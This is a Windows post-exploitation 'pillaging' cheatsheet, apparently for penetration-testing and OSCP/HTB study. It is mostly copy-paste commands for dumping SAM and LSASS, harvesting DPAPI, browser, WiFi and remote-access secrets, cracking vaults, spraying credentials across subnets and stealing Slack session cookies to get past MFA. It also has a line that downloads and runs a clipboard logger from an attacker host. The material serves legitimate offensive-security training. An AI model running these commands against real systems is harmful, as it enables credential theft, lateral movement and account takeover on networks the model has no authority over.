Skip to Content

Windows Pillaging

Cheatsheet

Simplified default stack (prefer this over five separate binaries):

  1. donpapi : browsers, CredMan, WiFi, mRemoteNG, RDCMan, VNC, certs, files (remote, one shot)
  2. nxc modules : SAM / LSA / NTDS / DPAPI / spray without leaving Mimikatz on-disk
  3. lsassy or pypykatz : LSASS without ProcDump → copy → Mimikatz
  4. Fall back to on-box LaZagne / SessionGopher / SharpChrome only when remote collectors fail

Preferred (remote harvest)

# DonPAPI (replaces LaZagne + SessionGopher + SharpChrome for most hosts) donpapi collect -t <TARGET_IP> -u <USER> -p '<PASS>' -d <DOMAIN> --collectors All donpapi gui # browse loot # NetExec SAM / LSA / NTDS / DPAPI in one CLI family nxc smb <TARGET_IP> -u <USER> -p '<PASS>' --sam # optional (tags) --lsa --ntds -M dpapi -M browser 2>/dev/null || true # LSASS without dropping Mimikatz on the target lsassy -u <USER> -p '<PASS>' -d <DOMAIN> <TARGET_IP> # Or parse a dump / hive offline pypykatz lsa minidump lsass.dmp pypykatz registry --sam SAM.SAV SYSTEM.SAV # Offline browser profiles copied off-host (Firefox/Chrome/Edge) HackBrowserData -b all -f <PROFILE_DIR> -o ./browser_loot

On-box fallbacks (when remote ops are blocked)

:: Confirm elevated access before assuming files are missing whoami /all net localgroup Administrators :: Local account hashes (admin/SYSTEM) reg save HKLM\SAM C:\Users\Public\SAM.SAV reg save HKLM\SYSTEM C:\Users\Public\SYSTEM.SAV reg save HKLM\SECURITY C:\Users\Public\SECURITY.SAV :: LSASS dump (prefer offline parse with pypykatz) procdump.exe -accepteula -ma lsass.exe C:\Users\Public\lsass.dmp rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Users\Public\lsass.dmp full :: Saved sessions / WiFi / Autologon cmdkey /list netsh wlan show profiles netsh wlan show profile name="<SSID>" key=clear reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Installed apps (role + vault targets) $apps = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* , HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation $apps | Where-Object DisplayName | Sort-Object DisplayName -Unique | Format-Table -AutoSize # PS history for every profile Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -EA SilentlyContinue | ForEach-Object { "`n=== $($_.FullName) ==="; Get-Content $_.FullName } # Legacy broad tools (use if DonPAPI unavailable) .\lazagne.exe all | Tee-Object C:\Users\Public\lazagne.txt Import-Module .\SessionGopher.ps1; Invoke-SessionGopher -Thorough
# Offline hash / dump processing on attack box impacket-secretsdump -sam SAM.SAV -system SYSTEM.SAV -security SECURITY.SAV LOCAL pypykatz lsa minidump lsass.dmp # Mimikatz only if pypykatz/lsassy miss something you need # sekurlsa::minidump lsass.dmp ; sekurlsa::logonpasswords

Pillaging touches LSASS, SAM, every user’s browser DPAPI blobs, and Credential Manager. Expect EID 4688, Sysmon 10 (process access), and DPAPI events. DonPAPI RemoteOps and LSASS access are especially loud stage once, capture once, avoid looping dir /s C:\ on a monitored host. Use donpapi --no-remoteops when EDR kills remote registry but file collectors still matter.

Phase 0: Orientation

?

Questions to ask

  • Who am I now, and does my token actually let me read SAM, other users’ profiles, and LSASS?
  • What role is this host (workstation, file server, jump box, SQL, backup, DC), and what data does that role imply?
  • What is watching me Defender, EDR, Credential Guard / LSA protection and what is the OPSEC cost of an LSASS dump?
  • What can this foothold reach that my attack box cannot (internal subnets, admin shares, dual-homed routes)?
  • Which credential or session, if found here, most cheaply unlocks the next host?
:: Confirm elevation, role, watchers, reach whoami /all hostname & systeminfo ipconfig /all & route print & arp -a netstat -ano tasklist /fi "imagename eq MsMpEng.exe" tasklist /fi "imagename eq lsass.exe"
  • Confirm identity and elevation (whoami /groups shows Administrators or SYSTEM. Test reg save HKLM\SAM).
  • Fingerprint host role from hostname, installed software, and listening services.
  • Note Defender/EDR and whether LSASS is PPL / Credential Guard before dumping.
  • Map dual-homed interfaces, routes, ARP, and admin-share reachability.
  • Decide first harvest target (local hashes vs domain cache vs app vault) from the host role.

Phase 1: Harvest OS Credentials

?

Questions to ask

  • Which OS stores are newly readable SAM/SECURITY, LSASS, LSA secrets, DPAPI, CredMan?
  • Are domain cached logons present, and is offline cracking worth the time versus spraying a plaintext I already hold?
  • Do Autologon, cmdkey, WiFi, or PuTTY proxy keys give me an immediate second identity?
  • Has every secret been queued for reuse against WinRM, RDP, SMB, MSSQL, and other hosts in Phase 4?
# Prefer remote first no binary left on target nxc smb <TARGET_IP> -u <USER> -p '<PASS>' --sam --lsa lsassy -u <USER> -p '<PASS>' -d <DOMAIN> <TARGET_IP> donpapi collect -t <TARGET_IP> -u <USER> -p '<PASS>' -d <DOMAIN> --collectors CredMan,Vaults,Wifi,Certificates
:: On-box hive dumps if nxc/DonPAPI remote ops fail reg save HKLM\SAM C:\Users\Public\SAM.SAV reg save HKLM\SYSTEM C:\Users\Public\SYSTEM.SAV reg save HKLM\SECURITY C:\Users\Public\SECURITY.SAV :: LSASS dump then parse with pypykatz offline (avoid Mimikatz on-box) tasklist /fi "imagename eq lsass.exe" procdump.exe -accepteula -ma lsass.exe C:\Users\Public\lsass.dmp :: Built-in credential surfaces cmdkey /list reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" netsh wlan show profiles
# Offline parse impacket-secretsdump -sam SAM.SAV -system SYSTEM.SAV -security SECURITY.SAV LOCAL pypykatz lsa minidump lsass.dmp
:: Mimikatz (elevated) last resort when lsassy/pypykatz miss material privilege::debug token::elevate sekurlsa::logonpasswords lsadump::sam lsadump::secrets lsadump::cache sekurlsa::dpapi
  • Prefer nxc --sam/--lsa + lsassy from the attack box before dropping dump tools.
  • Save SAM/SYSTEM/SECURITY on-box only if remote collectors fail. Extract with secretsdump/pypykatz.
  • Dump LSASS only when needed. Parse with pypykatz / lsassy offline Mimikatz on-box is last resort.
  • Pull LSA secrets and cached domain hashes. Note service-account passwords in secrets.
  • Enumerate cmdkey /list and test runas /savecred / RDP reuse where applicable.
  • Read Autologon (DefaultUserName/DefaultPassword), WiFi PSKs, VNC registry keys (DonPAPI Wifi/VNC collectors cover this remotely).
  • Record every plaintext, NTLM, and ticket material with source path for Phase 4 spray and the report.

Phase 2: Application, Browser & Session Secrets

?

Questions to ask

  • Which remote-access / vault apps are installed (mRemoteNG, KeePass, WinSCP, PuTTY, RDP, VPN)?
  • Can I decrypt browser logins/cookies as this user, or do I need the user’s DPAPI context?
  • Does a .kdbx, confCons.xml, or SessionGopher hit unlock jump hosts or network gear?
  • Can Slack/Teams cookies or MailSniper hits yield MFA-bypass session access?
  • Should I monitor the clipboard for password-manager paste events before moving on?
# One-shot app + browser + session harvest (preferred) donpapi collect -t <TARGET_IP> -u <USER> -p '<PASS>' -d <DOMAIN> \ --collectors Chromium,Firefox,MRemoteNG,MobaXterm,RDCMan,CredMan,Vaults,Wifi,VNC,Files,Certificates # Unlock many users' DPAPI with the domain backup key when you have DA-equivalent donpapi collect -t <TARGETS> -u <USER> -p '<PASS>' -d <DOMAIN> --fetch-pvk
# Inventory apps that store connection secrets (manual confirm) dir "C:\Program Files","C:\Program Files (x86)" | findstr /i "mRemote KeePass WinSCP OpenVPN TeamViewer FileZilla" # mRemoteNG default master password is often still mR3m dir C:\Users\*\AppData\Roaming\mRemoteNG\confCons.xml # Fallback session tooling if DonPAPI unavailable Import-Module .\SessionGopher.ps1 Invoke-SessionGopher -Thorough .\lazagne.exe browsers sysadmin windows wifi all .\SharpChrome.exe logins /unprotect
# Browser profiles copied off-host → HackBrowserData (logins + cookies) HackBrowserData -b chrome -f ./ChromeUserData -o ./chrome_out HackBrowserData -b firefox -f ./FirefoxProfile -o ./ff_out # KeePass offline keepass2john <FILE>.kdbx > keepass.hash hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt # mRemoteNG password attribute (default master pw mR3m if unset) python3 mremoteng_decrypt.py -s "<Password_attribute>" python3 mremoteng_decrypt.py -s "<Password_attribute>" -p <MASTER>
  • Run DonPAPI first for browsers, mRemoteNG, RDCMan, CredMan, WiFi, VNC, certs one collector pass.
  • If domain admin path exists, --fetch-pvk so masterkeys decrypt across hosts/users.
  • List installed software. Manually confirm vault/RDP/SSH clients DonPAPI might miss (KeePass .kdbx).
  • Fall back to SessionGopher + LaZagne + SharpChrome only when remote collectors fail.
  • Offline: HackBrowserData on copied profiles for logins/cookies (Slack d, etc.). Impersonate in a controlled browser.
  • Find .kdbx / password-manager DBs. Crack offline. Inventory vault contents for high-value targets.
  • Search mail (MailSniper) for pass/creds if Exchange mailbox is in scope.
  • Optionally start clipboard logger on interactive admin sessions (Invoke-ClipboardLogger).
  • Queue every recovered app password for reuse before Phase 3 file sweeps.

Phase 3: Files, Backups & Sensitive Data

?

Questions to ask

  • Which user desktops/documents, shares, and ProgramData paths hold PII, creds, or IP?
  • Are there .vmdk/.vhdx/restic/backup repos I can mount or restore for SAM/NTDS/web roots?
  • Do IIS/web.config, unattend, sticky notes, or scripts leak connection strings?
  • Which artifacts prove impact for the report versus which only feed further access?
  • Dump everything now (loud) or selectively collect (quiet)?
:: High-yield file hunt (scope paths void blind C:\ recursion on EDR hosts) dir /s /b C:\Users\*.txt C:\Users\*.csv C:\Users\*.xlsx C:\Users\*.kdbx C:\Users\*.rdp 2>nul dir /s /b C:\inetpub\wwwroot\web.config C:\Windows\Panther\Unattend.xml 2>nul dir /s /b C:\*.vhd C:\*.vhdx C:\*.vmdk C:\*.bak 2>nul findstr /SIM /C:"password" C:\Users\*\Documents\*.txt C:\Users\*\Desktop\*.txt C:\inetpub\*.config 2>nul
# Sticky Notes DB dir C:\Users\*\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_*\LocalState\plum.sqlite # restic repos look for snapshots dirs / RESTIC_PASSWORD in env/scripts Get-ChildItem -Recurse -Directory -Filter snapshots -Path C:\,E:\ -EA SilentlyContinue | Select-Object FullName restic.exe -r <REPO> snapshots restic.exe -r <REPO> restore <ID> --target C:\Users\Public\restore
# Mount disk images offline, then secretsdump guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1 impacket-secretsdump -sam SAM -system SYSTEM LOCAL
  • Sweep Desktop/Documents/Downloads for notes, spreadsheets, .kdbx, .rdp, scripts.
  • Pull IIS/web.config, unattend/sysprep leftovers, sticky-notes DB, PowerShell transcripts.
  • Locate backup products (restic, Veeam, vendor agents). List snapshots. Restore high-value hosts/paths.
  • Mount .vmdk/.vhdx backups → extract SAM/SYSTEM (and NTDS if DC image).
  • Collect impact evidence (PII, financial, source) with provenance

Phase 4: Network Recon & Lateral Targets

?

Questions to ask

  • What other hosts does this box already know (ARP, RDP history, PuTTY/WinSCP sessions, mRemoteNG nodes)?
  • Which internal services and shares are reachable from here that my attack box cannot hit?
  • Which harvested credential maps to which discovered host what is the most likely reuse pair?
  • Do I need a pivot for a newly discovered subnet?
  • What spray order avoids lockouts?
:: Who does this host already talk to? arp -a route print netstat -ano net view /domain net group "Domain Admins" /domain
# Session / RDP breadcrumbs cmdkey /list dir C:\Users\*\AppData\Local\Microsoft\Terminal Server Client\Cache -EA SilentlyContinue reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s # From mRemoteNG / SessionGopher output build host:user:pass table
# Spray + dump next hosts in the same toolkit (confirm lockout policy first) nxc smb <CIDR> -u <USER> -p '<PASS>' --continue-on-success # On each new admin hit harvest immediately, don't context-switch tools nxc smb <TARGET_IP> -u <USER> -H <NTHASH> --sam --lsa lsassy -u <USER> -H <NTHASH> -d <DOMAIN> <TARGET_IP> donpapi collect -t <TARGET_IP> -u <USER> -H <NTHASH> -d <DOMAIN> --collectors All impacket-psexec <DOMAIN>/<USER>:'<PASS>'@<TARGET_IP> evil-winrm -i <TARGET_IP> -u <USER> -p '<PASS>'
  • Build a target list from ARP, routes, DNS suffix, domain groups, and saved-session hostnames.
  • Enumerate reachable admin shares and internal services from this vantage point.
  • Pair each harvested credential/hash with candidate hosts before testing.
  • Stand up a pivot if a new subnet is only reachable from here.
  • Confirm lockout policy, then reuse with nxc on each win, immediately --sam/--lsa + DonPAPI/lsassy before moving on.

Phase 5: Automated Sweep & Evidence

?

Questions to ask

  • Did DonPAPI/nxc miss anything an on-box WinPEAS/Seatbelt/LaZagne pass would catch?
  • Does tool output corroborate or contradict my manual findings?
  • Have I captured tool logs and dumps as evidence rather than relying on scrollback?
  • Is persistence or cleanup required before I move to the next host?
# Prefer finishing remote collectors + GUI review before more on-box noise donpapi collect -t <TARGET_IP> -u <USER> -p '<PASS>' -d <DOMAIN> --collectors All donpapi gui
:: On-box gap-fill save logs .\winPEASx64.exe cmd quiet > C:\Users\Public\winpeas_admin.txt .\Seatbelt.exe -group=all > C:\Users\Public\seatbelt.txt .\lazagne.exe all > C:\Users\Public\lazagne.txt
  • Complete DonPAPI + nxc/lsassy first. Review donpapi gui loot.
  • Re-run on-box WinPEAS/Seatbelt/LaZagne only to gap-fill. Diff against remote findings.
  • Manually validate every high-value automated hit.
  • Archive dumps, histories, configs, and tool logs with timestamps and source paths.
  • Decide persistence/cleanup. Remove dropped binaries and open shares used for exfil when RoE requires it.

Reference

What pillaging buys you

With Administrator/SYSTEM you can read every credential store on the box. The point is not “having admin” it is converting that into access elsewhere and reportable impact.

  • Extract local/domain hashes and plaintext for reuse and cracking.
  • Recover browser, RDP, SSH, VPN, and password-manager secrets for pivoting.
  • Mount or restore backups to reach data not present on the live disk.
  • Identify and reach other systems on the internal network.
  • Gather concrete evidence (paths, dumps, screenshots) for the report.

Credential reuse is the highest-yield move in pillaging. Helpdesk and IT passwords from DonPAPI/LaZagne, mRemoteNG, or Autologon frequently work on servers, databases, and network devices. Try every secret everywhere before falling back to long cracking jobs.

Complexity reducers (use these first)

ToolReplacesWhen
DonPAPI LaZagne + SessionGopher + SharpChrome + much manual DPAPIAdmin/creds over SMB. --fetch-pvk for domain DPAPI
NetExec  (nxc)Separate dump + spray scripts--sam / --lsa / --ntds / modules, then spray same CLI
lsassy ProcDump → copy → MimikatzRemote LSASS parse. No Mimikatz on target
pypykatz Mimikatz offline for dumps/hiveslsa minidump, registry SAM parse on attack box
HackBrowserData SharpChromium + Firefox SQLite + Cookie-EditorOffline profile folder → logins + cookies
# DonPAPI quick reference donpapi collect -t 10.10.10.0/24 -u admin -p 'Pass' -d CORP --collectors All --fetch-pvk donpapi collect -t 10.10.10.50 -u admin -p 'Pass' -d CORP --no-remoteops # quieter / EDR dodge donpapi gui # lsassy variants lsassy -u admin -p 'Pass' -d CORP 10.10.10.50 lsassy -u admin -H <NTHASH> -d CORP 10.10.10.50

OS credential stores

StoreHow to collectOffline parse
SAM/SYSTEM/SECURITYnxc --sam or reg save HKLM\...impacket-secretsdump / pypykatz registry
LSASSlsassy (preferred) or ProcDump / comsvcspypykatz lsa minidump / Mimikatz
LSA secretsnxc --lsa / Mimikatz lsadump::secretsService account passwords
Domain cached logonslsadump::cache / lsassy outputCrack MSCASH2 / reuse if plaintext appears elsewhere
CredMan / DPAPIDonPAPI / SharpDPAPI / LaZagneDomain PVK via donpapi --fetch-pvk unlocks many users
AutologonWinlogon registry / DonPAPI FilesCleartext if misconfigured
WiFiDonPAPI Wifi collector or netsh ... key=clearPSK reuse on corp/guest SSIDs
:: comsvcs MiniDump (no ProcDump binary) :: Replace <PID> with lsass PID from tasklist rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\Users\Public\lsass.dmp full

Application credential locations

ApplicationPath / artifactNotes
mRemoteNG%APPDATA%\mRemoteNG\confCons.xmlDefault master password mR3m if unset
KeePass*.kdbxhashcat -m 13400
WinSCP / FileZilla / PuTTY / RDPDonPAPI / SessionGopher / LaZagnePuTTY proxy password often cleartext in session key
Chrome / EdgeLogin Data + Local State (DPAPI)DonPAPI Chromium / HackBrowserData offline / SharpChrome
Firefox%APPDATA%\Mozilla\Firefox\Profiles\*.default-release\DonPAPI Firefox / HackBrowserData / cookies.sqlite
SlackCookie d (.slack.com)Session steal → search chats for creds
Sticky Notes...\MicrosoftStickyNotes_*\LocalState\plum.sqliteQuery Note.Text or strings
IISC:\inetpub\wwwroot\web.configConnection strings
UnattendC:\Windows\Panther\, sysprep pathsPlaintext/base64 local admin

mRemoteNG decrypt workflow

# 1) Pull confCons.xml from user profile # 2) Copy Node Password= attribute python3 mremoteng_decrypt.py -s "<cipher>" # tries default mR3m python3 mremoteng_decrypt.py -s "<cipher>" -p <MASTER> # Crack unknown master against a small list for p in $(cat /usr/share/seclists/Passwords/Common-Credentials/best110.txt); do python3 mremoteng_decrypt.py -s "<cipher>" -p "$p" 2>/dev/null && echo "HIT $p" done

Browser cookies (Slack example)

# Firefox: copy DB off-host, extract cookie d copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
python3 cookieextractor.py --dbpath ./cookies.sqlite --host slack --cookie d # Import value into Cookie-Editor on slack.com, refresh, Launch Slack, search "pass|creds"
# Chromium cookies DPAPI-encrypted; decrypt as the user copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" ` "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies" Invoke-SharpChromium -Command "cookies slack.com"

Backup abuse patterns

Backup typeAttacker move
.vmdk / .vhdx / .vhdMount offline → SAM/SYSTEM (or NTDS) → secretsdump
restic repositoryFind repo + password (RESTIC_PASSWORD / scripts) → snapshots → restore
Vendor backup console (Veeam, etc.)Admin on backup server ≈ admin on backed-up estate
File-share “backups” foldersHunt for archived configs, VPN profiles, old web roots
# restic password via env or prompt $env:RESTIC_PASSWORD = '<PASS>' restic.exe -r E:\restic\ snapshots restic.exe -r E:\restic\ restore <SNAPSHOT_ID> --target C:\Users\Public\restore # Prefer Windows paths inside restore: C:\Users\Public\restore\C\...

Clipboard monitoring

IEX(New-Object Net.WebClient).DownloadString('http://<LHOST>/Invoke-Clipboard.ps1') Invoke-ClipboardLogger # Wait for password-manager paste / Azure portal logins

Useful when admins never type passwords (Ctrl+C from KeePass/CyberArk). Leave running only while interactive use is likely. It is persistent noise if forgotten.

Common Mistakes

  • Treating access-denied on SAM/LSASS as “nothing here” verify elevation first.
  • Running LaZagne + SessionGopher + SharpChrome + Mimikatz separately when DonPAPI + lsassy + nxc would have covered it in three commands.
  • Cracking NTLM/MSCASH for hours before spraying plaintexts from Autologon, DonPAPI, or mRemoteNG.
  • Dumping LSASS on Credential Guard / PPL hosts without a fallback plan, burning the foothold to EDR.
  • Ignoring installed remote-access apps (mRemoteNG, WinSCP, KeePass) and only running Mimikatz.
  • Restoring entire backup sets to disk instead of targeting SAM/web.config/SSH keys.
  • Pasting fabricated example credentials into the report instead of real, sourced findings.
  • Skipping cookie/session theft when MFA blocks password reuse into SaaS/IM.

Quiz

You are SYSTEM on a jump box. Program Files shows mRemoteNG. ConfCons.xml decrypts with the default master password. What is the highest-value next move?

Quiz

LSASS dump tools are blocked by EDR, but you have local admin. Which pillaging path still reliably yields lateral creds?

Quiz

You have local admin on five jump hosts and want browser + mRemoteNG + WiFi secrets with minimal tool juggling. Best first move?

Quiz

You stole a Slack cookie d from Firefox cookies.sqlite for an IT user. MFA is enabled on the tenant. What do you do?

#Windows #Pillaging #PostExploitation #RedTeam #PenetrationTesting #CredentialAccess #BrowserSecrets #mRemoteNG #DPAPI #LateralMovement #HTB #OSCP #WindowsInternals

Last updated on